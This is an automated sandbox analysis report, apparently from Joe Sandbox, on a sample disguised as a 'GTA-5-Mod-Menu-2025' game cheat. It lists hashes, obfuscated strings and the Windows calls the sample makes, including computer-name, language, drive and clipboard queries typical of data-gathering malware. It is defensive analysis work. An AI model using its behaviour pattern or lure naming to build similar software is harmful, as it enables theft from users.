                                                                    • Opcode Fuzzy Hash: 00de8a58601623091de1ddb511819d236fd72ee68c6e052be62c42d3192636a9
                                                                    • Instruction Fuzzy Hash: 15F0B4AAE189418FD7048F65EC8173737E2A75B205F0854B9D502D73E6DF388806CB1E
                                                                    APIs
                                                                    • LdrInitializeThunk.NTDLL(00440370,00000002,00000018,?,?,00000018,?,?,?), ref: 0043CF5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 54+*
                                                                    • API String ID: 0-1746447996
                                                                    • Opcode ID: ec4ca10cfb400fcbc8912dfccf5f2896a6f19050594e562d19a141d497995b7e
                                                                    • Instruction ID: 7ea4c9c9f6b25cce6cbd6b23a76116404c6ff45e516211294293d193a21c89b4
                                                                    • Opcode Fuzzy Hash: ec4ca10cfb400fcbc8912dfccf5f2896a6f19050594e562d19a141d497995b7e
                                                                    • Instruction Fuzzy Hash: 70213B36E452449FD719CF54DCC2B6E7772AB8E300F28512BD550BB3E2CAB85C019B98
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0608893cc6d712e37cd31bc363bb4072e7a72471fbcc1f0e7a8e95331caccf65
                                                                    • Instruction ID: 6b2d2458c1a3647a0d801ce0296a380f19781d0d32e3f7f323e955e2adea9a0c
                                                                    • Opcode Fuzzy Hash: 0608893cc6d712e37cd31bc363bb4072e7a72471fbcc1f0e7a8e95331caccf65
                                                                    • Instruction Fuzzy Hash: 07815277B083115BD3249F28CC8166BB7E6ABC9314F1D9A3EE9C4D3259D638DC018798

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1377 42b35b-42b365 1378 42b367-42b36f 1377->1378 1379 42b37b-42b3c5 call 43eb60 1377->1379 1380 42b370-42b379 1378->1380 1385 42b3d0-42b404 1379->1385 1380->1379 1380->1380 1385->1385 1386 42b406-42b410 1385->1386 1387 42b412-42b419 1386->1387 1388 42b42b-42b46a GetComputerNameExA 1386->1388 1389 42b420-42b429 1387->1389 1390 42b46b 1388->1390 1389->1388 1389->1389 1390->1390
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?), ref: 0042B385
                                                                    • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B44B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ComputerFreeLibraryName
                                                                    • String ID: #v
                                                                    • API String ID: 2904949787-554117064
                                                                    • Opcode ID: 702232d4916de885d8f38087b19d9b3caafa412bcb425aa5952e3dfa16cfaa5d
                                                                    • Instruction ID: 1ba5b36431b5bcdc1af4905024e9bdd09d94c196953bd0fa2893e016a5f5a0a7
                                                                    • Opcode Fuzzy Hash: 702232d4916de885d8f38087b19d9b3caafa412bcb425aa5952e3dfa16cfaa5d
                                                                    • Instruction Fuzzy Hash: F221C17020C3909ADB26CF35A8647FB7BE0EB4B304F8848AED4DAC7292DB354505DB56

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1391 42b359-42b3c5 call 43eb60 1396 42b3d0-42b404 1391->1396 1396->1396 1397 42b406-42b410 1396->1397 1398 42b412-42b419 1397->1398 1399 42b42b-42b46a GetComputerNameExA 1397->1399 1400 42b420-42b429 1398->1400 1401 42b46b 1399->1401 1400->1399 1400->1400 1401->1401
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?), ref: 0042B385
                                                                    • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B44B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ComputerFreeLibraryName
                                                                    • String ID: #v
                                                                    • API String ID: 2904949787-554117064
                                                                    • Opcode ID: 6b873924ed13d5cb4503528d9c76a607569f312522b785652d292324da45b8d6
                                                                    • Instruction ID: dea41b85e38e3cae8d20267b98e38e6c9c700ad73d40f47a6a845ef91b2277b9
                                                                    • Opcode Fuzzy Hash: 6b873924ed13d5cb4503528d9c76a607569f312522b785652d292324da45b8d6
                                                                    • Instruction Fuzzy Hash: 5711EE7120C3909BDB29CF35E8687EB7BE4EB8B304F84486ED0CAC6292DB3445059B56
                                                                    APIs
                                                                    • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B44B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ComputerName
                                                                    • String ID:
                                                                    • API String ID: 3545744682-0
                                                                    • Opcode ID: ea3927b13e452b39a6f2b69043e87f06f88643b9929e2d23ce3bf8c4d79a91d1
                                                                    • Instruction ID: 9bd314025b3b3ef62a8dc0dea97ba74b17d2a7b8940916a7b57aad9051951337
                                                                    • Opcode Fuzzy Hash: ea3927b13e452b39a6f2b69043e87f06f88643b9929e2d23ce3bf8c4d79a91d1
                                                                    • Instruction Fuzzy Hash: F711B27120C3909ADB29CF35A8647FB7BE4EB8B304F84486ED0DBC7281DB3555059B56
                                                                    APIs
                                                                    • GetUserDefaultUILanguage.KERNELBASE ref: 00436A41
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: DefaultLanguageUser
                                                                    • String ID:
                                                                    • API String ID: 95929093-0
                                                                    • Opcode ID: 082eec1d78f509ef31d3cf197b1d838a71956add6eaf737015400e4656447f6e
                                                                    • Instruction ID: dbe6f92be45b6e644db365ba98387a2b8db1edec6e7d8e009aa07e547563f622
                                                                    • Opcode Fuzzy Hash: 082eec1d78f509ef31d3cf197b1d838a71956add6eaf737015400e4656447f6e
                                                                    • Instruction Fuzzy Hash: 9711EC33E05AA28FC719CA3C8950159BBA26B9A210F19C3EDC866B73D5CA305D11CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 610e875d08db9119492dc585ff7113e97d95560b75c2511342cd4b8c56ee8bd0
                                                                    • Instruction ID: 863c5fbee0c7f3df386f553e45eb6441c65696ce7611e36eaf832af42259de93
                                                                    • Opcode Fuzzy Hash: 610e875d08db9119492dc585ff7113e97d95560b75c2511342cd4b8c56ee8bd0
                                                                    • Instruction Fuzzy Hash: 1CE02B36418211EBC2002B257C09B1F3664EFCE710F15087AF400A2155DB3CE80186EF
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: BlanketProxy
                                                                    • String ID:
                                                                    • API String ID: 3890896728-0
                                                                    • Opcode ID: 591901b9b37ade1a989681dbc93abf8fa580ac5217d21b4560b0abff6cbb82d3
                                                                    • Instruction ID: 608e1ede2ebc3b467fa3772654d36eba2b63007b4de2f6af21c599178e6b5471
                                                                    • Opcode Fuzzy Hash: 591901b9b37ade1a989681dbc93abf8fa580ac5217d21b4560b0abff6cbb82d3
                                                                    • Instruction Fuzzy Hash: 2AF0B7B46097018FE314DF28D56871BBBE1BBC5314F00891DE5998B350C7B59949CF86
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: BlanketProxy
                                                                    • String ID:
                                                                    • API String ID: 3890896728-0
                                                                    • Opcode ID: f8db59a5bf91ea8ae1f06f84e5e9cbd01fdb9aa81b23c880af4633124e8c83b1
                                                                    • Instruction ID: 041be1bada5abe7387cf79b1710c976d2a82e00eac2282a2b14f717ddb5291f4
                                                                    • Opcode Fuzzy Hash: f8db59a5bf91ea8ae1f06f84e5e9cbd01fdb9aa81b23c880af4633124e8c83b1
                                                                    • Instruction Fuzzy Hash: 8CF074B450D3428FE314DF68C5A871BBBE1BB85348F40891CE4958B390C7B69648CF82
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(?,00000000,?,00414704,?), ref: 0043B251
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: 8b9904cbeb18d93210e43c4a1b0d4448102e67cfa60bdd9c4f9da902e19d558f
                                                                    • Instruction ID: 24dbd1474c357ea6abca065723ce719fa199d3eadc188d416c92d3265e936af3
                                                                    • Opcode Fuzzy Hash: 8b9904cbeb18d93210e43c4a1b0d4448102e67cfa60bdd9c4f9da902e19d558f
                                                                    • Instruction Fuzzy Hash: FCD01731809122FFC6112B65BC02B8A3664AF4E361F0A48AAE1045A0B1DB39CC41CE99
                                                                    APIs
                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C763
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize
                                                                    • String ID:
                                                                    • API String ID: 2538663250-0
                                                                    • Opcode ID: 235490dd7c0a20c242dffb008bb297edb8fcc1c2205090b3853fd5e35335a6ab
                                                                    • Instruction ID: 35a066782ec2156b7277d96b6bb1445f52de54372100dfdc21345d2ec2160b87
                                                                    • Opcode Fuzzy Hash: 235490dd7c0a20c242dffb008bb297edb8fcc1c2205090b3853fd5e35335a6ab
                                                                    • Instruction Fuzzy Hash: 8AD0A7755501447BD214675CEC07F66776CE783715F800235F362C76D1DD90B910D569
                                                                    APIs
                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C795
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeSecurity
                                                                    • String ID:
                                                                    • API String ID: 640775948-0
                                                                    • Opcode ID: d3b2f6c4895501b5ab91bf7567167118f94e3793d29a38ce57797f27848e64f4
                                                                    • Instruction ID: 8c43644f0df65177ff6421f4d7acf314187a5d0075bbea538e80a61589bc0ee9
                                                                    • Opcode Fuzzy Hash: d3b2f6c4895501b5ab91bf7567167118f94e3793d29a38ce57797f27848e64f4
                                                                    • Instruction Fuzzy Hash: 57D0C934BD43417AF1A49B08ED57F1032549782F15F300224B362FE2E0C9D0B100860D
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,00000000,?,?,0040893A,1110049E), ref: 0043B220
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 127d7021a0357c8a87d4216beb14fd6cfe9d5466f4785d17cdcf8522e32ecd31
                                                                    • Instruction ID: 2146790a7e07a7bcd61b284ea10af0aaa1ee16b8a37b50a64afb627c168019b4
                                                                    • Opcode Fuzzy Hash: 127d7021a0357c8a87d4216beb14fd6cfe9d5466f4785d17cdcf8522e32ecd31
                                                                    • Instruction Fuzzy Hash: 67C09B31445120BBC5102B16FC49FC67F58DF45351F154495B005670B2C770EC41CED9
                                                                    APIs
                                                                      • Part of subcall function 0043CF30: LdrInitializeThunk.NTDLL(00440370,00000002,00000018,?,?,00000018,?,?,?), ref: 0043CF5E
                                                                    • FreeLibrary.KERNEL32(?), ref: 004199F6
                                                                    • FreeLibrary.KERNEL32(?), ref: 00419A6B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary$InitializeThunk
                                                                    • String ID: "W$Q$2C%]$RS$l[(U$m_jY$#v$$$
                                                                    • API String ID: 764372645-995325495
                                                                    • Opcode ID: 0b4af268c1ba0121ecaff419ed3874ba7e5de519abce5e40b5fb68b92a7fd73e
                                                                    • Instruction ID: aa92527347dc5268acee257bbf81cf0051288069bbbb3ca843c98ffa2b397c74
                                                                    • Opcode Fuzzy Hash: 0b4af268c1ba0121ecaff419ed3874ba7e5de519abce5e40b5fb68b92a7fd73e
                                                                    • Instruction Fuzzy Hash: 0F825675619340AFD724CB25CC9176BBBE2ABD9350F28882EE0C587365D638DC81CF5A
                                                                    APIs
                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00427579
                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004275E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentExpandStrings
                                                                    • String ID: "vB$"vB$CxB$KyB$X2g0$hxB$iv
                                                                    • API String ID: 237503144-3246612585
                                                                    • Opcode ID: cb4b1db522b94e1775afdc64a30cf746190210310ee6f99ab70d9afc9d1cb643
                                                                    • Instruction ID: ed78c50a7d9866ee9609980896a38891c50be3bdd8bce2317c83d1d0d4c56717
                                                                    • Opcode Fuzzy Hash: cb4b1db522b94e1775afdc64a30cf746190210310ee6f99ab70d9afc9d1cb643
                                                                    • Instruction Fuzzy Hash: 38C1FEB5A08310DFD3108F18E84071BBBE1EBCA714F55892DE989A7391D775E905CB8B
                                                                    APIs
                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00427579
                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004275E4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentExpandStrings
                                                                    • String ID: "vB$"vB$CxB$KyB$X2g0$hxB$iv
                                                                    • API String ID: 237503144-3246612585
                                                                    • Opcode ID: a5c86de6f952cb508fd514bbfaf09dbd82464d2154d7ceed3f2259b202b922fb
                                                                    • Instruction ID: 932d1ddd98badc50e75d153df181333331b17d65aff21f083f25902d6f1b28a1
                                                                    • Opcode Fuzzy Hash: a5c86de6f952cb508fd514bbfaf09dbd82464d2154d7ceed3f2259b202b922fb
                                                                    • Instruction Fuzzy Hash: 39B1FEB5608350CFD3108F28E88071BBBE0EBCA704F55892DE985AB391D7B5D905CB8B
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: DrivesLogical
                                                                    • String ID: 45$t2$y$HN$pv$tz
                                                                    • API String ID: 999431828-2429670011
                                                                    • Opcode ID: f3006ca9c235a2daedc199195299cd5de7b800c7cf450bd34368201b09023e7e
                                                                    • Instruction ID: 5a73697db411ee13797b79c9f647b4784aec8b81d6339e9191e827630310b4ff
                                                                    • Opcode Fuzzy Hash: f3006ca9c235a2daedc199195299cd5de7b800c7cf450bd34368201b09023e7e
                                                                    • Instruction Fuzzy Hash: 2FB174B0609380DFD700EF15E88166BBBF1EB86748F50992DE1D59B211E3789A46CB4B
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                    • String ID: R
                                                                    • API String ID: 2832541153-1466425173
                                                                    • Opcode ID: b0b5be2cd8172e043d23e39cb18898a930aaa770be71c0ab7e943b9c29670a71
                                                                    • Instruction ID: 31c7b9fb774cc7d891dc00418efd392389040aff0cc4cfa9da3350d23de6a26b
                                                                    • Opcode Fuzzy Hash: b0b5be2cd8172e043d23e39cb18898a930aaa770be71c0ab7e943b9c29670a71
                                                                    • Instruction Fuzzy Hash: 5641B27150C7828EC304AF7C958831FBEE09B96324F044B3DE5E5963D2D6B88585C797
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $B7@$4J9H$5^;\$@6D4$G2W0$K>B<$\N=L$u.p,$mA
                                                                    • API String ID: 0-1267596520
                                                                    • Opcode ID: e7b8207d99717d6c5ac4bb3c42a59a657c0280431c1527ba2b65d47d9cf6c2fd
                                                                    • Instruction ID: 9630a44cccf1b5eda50ffd861a1fee61a0e6d3e610a3fce5884dad38d24e0746
                                                                    • Opcode Fuzzy Hash: e7b8207d99717d6c5ac4bb3c42a59a657c0280431c1527ba2b65d47d9cf6c2fd
                                                                    • Instruction Fuzzy Hash: B4D1DFB56017018FC724CF29C491B62BBF2FF85310F1A86ADC4968B765E778E841CB84
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !'$>$BRLL$C]KN$QVVP$Y@I9$~
                                                                    • API String ID: 0-4030735238
                                                                    • Opcode ID: 09bedd2aba70a78016ec3cad4a2f0163782b3a6e45fe0f02d64a60f956e88df1
                                                                    • Instruction ID: 4eaaf35f588cb58bf6b7023ee20699753de47eb06926e62c43decc8dc3330243
                                                                    • Opcode Fuzzy Hash: 09bedd2aba70a78016ec3cad4a2f0163782b3a6e45fe0f02d64a60f956e88df1
                                                                    • Instruction Fuzzy Hash: 2C729E7450C3518FC725CF25C8507AFBBE1AF95304F088A6EE8E54B382D7399946CB96
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: OMQL$ZASY$ecv$ecv$hlzn$iukl$v
                                                                    • API String ID: 0-2048791439
                                                                    • Opcode ID: be1a5fd6c10b869317c23b45c390f2cd4d9aed9c8e1051da07d9a4a81fcef876
                                                                    • Instruction ID: be96c4ddf38c931e840ef98c6541bcac57307c5dac2786bf8bb90604c1667e7f
                                                                    • Opcode Fuzzy Hash: be1a5fd6c10b869317c23b45c390f2cd4d9aed9c8e1051da07d9a4a81fcef876
                                                                    • Instruction Fuzzy Hash: 4561C43164D3C29AD3118F7584A076BFFE09FA3700F0859AEE4D45B382D3398919D76A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $-/&1$694?$Gb03$V,_!$W8$m
                                                                    • API String ID: 0-3075149852
                                                                    • Opcode ID: 3eefd7f81ed0479454b0dbe7166a133b3337e97782b94e9cbe5ed6d739c9a33a
                                                                    • Instruction ID: 07534d52fd8654af7c634005e638618e25429ba14b9db59fe1cdb4dfdfb4e919
                                                                    • Opcode Fuzzy Hash: 3eefd7f81ed0479454b0dbe7166a133b3337e97782b94e9cbe5ed6d739c9a33a
                                                                    • Instruction Fuzzy Hash: 0D81AAB420D3918BD3358F2594A03EBBFE1AF96304F58899DE8C95B341D7398406CB5B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: q6L|$u6L|
                                                                    • API String ID: 0-4026611235
                                                                    • Opcode ID: 18d0c5db816874cb61c2183cf5bfddce40293194255e5619b09eec3c00f6d0f9
                                                                    • Instruction ID: d0c996030e5aab2461a3f99bd8c74c650034a66cfaae767ccd945719e2cbae30
                                                                    • Opcode Fuzzy Hash: 18d0c5db816874cb61c2183cf5bfddce40293194255e5619b09eec3c00f6d0f9
                                                                    • Instruction Fuzzy Hash: 0DE10075600B01CFC724CF29C8916A3B7F2FF99310B198AADD4968B7A5D739E842CB44
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: =::8$f$$
                                                                    • API String ID: 2994545307-2077278400
                                                                    • Opcode ID: 5b6f0666ccfc26040dab8f432d891a0c18c09ccf58fd79ce2bc93a4fe8ae563e
                                                                    • Instruction ID: 1bd3f32885875e6d0890e585b4ef16a533047c91f684153c2df5fe5c59a5d402
                                                                    • Opcode Fuzzy Hash: 5b6f0666ccfc26040dab8f432d891a0c18c09ccf58fd79ce2bc93a4fe8ae563e
                                                                    • Instruction Fuzzy Hash: 3D222636A083458FD314CF28C880B6BB7E2EBC9314F189A2EE59597391D774ED05CB86
                                                                    APIs
                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429001
                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429195
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
